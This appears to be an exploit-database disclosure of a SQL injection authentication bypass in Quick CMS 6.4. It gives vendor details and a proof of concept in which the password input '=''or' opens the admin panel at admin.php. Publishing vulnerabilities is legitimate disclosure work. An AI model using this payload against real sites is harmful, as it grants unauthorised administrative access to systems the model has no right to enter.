Quick CMS 6.4 SQL Injection / Authentication Bypass

Quick CMS version 6.4 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | fcbaf3be8a8a4e01d28e4b92bd8b5631

 ___________________________________________________
|
| Exploit Title: Quick.Cms_v6.4 Autentication Bypass Vulnerability
| Exploit Author: Ashiyane Digital security Team (M.R.S.L.Y)
| Vendor Homepage: http://opensolution.org
| Software Link:
http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.4-en.zip
| Version: Quick.Cms_v6.4
| Date: 2017-10-14
| Category: webapps
| Tested on: Kali-Linux /FireFox
| CVE: N/A
| Dork: N/A
|__________________________________________________

The vulnerability is in the login area of Quick.Cms_v6.4,
where we can enter the panel only using some parameters such as
password
__________________________________________________

Proof of Concept :

http://127.0.0.1/PATH/admin.php => User: attacker@gmail.com Pass:
'=''or'

__________________________________________________

Discovered By : Ashiyane Digital security Team
__________________________________________________

Related Posts

Comments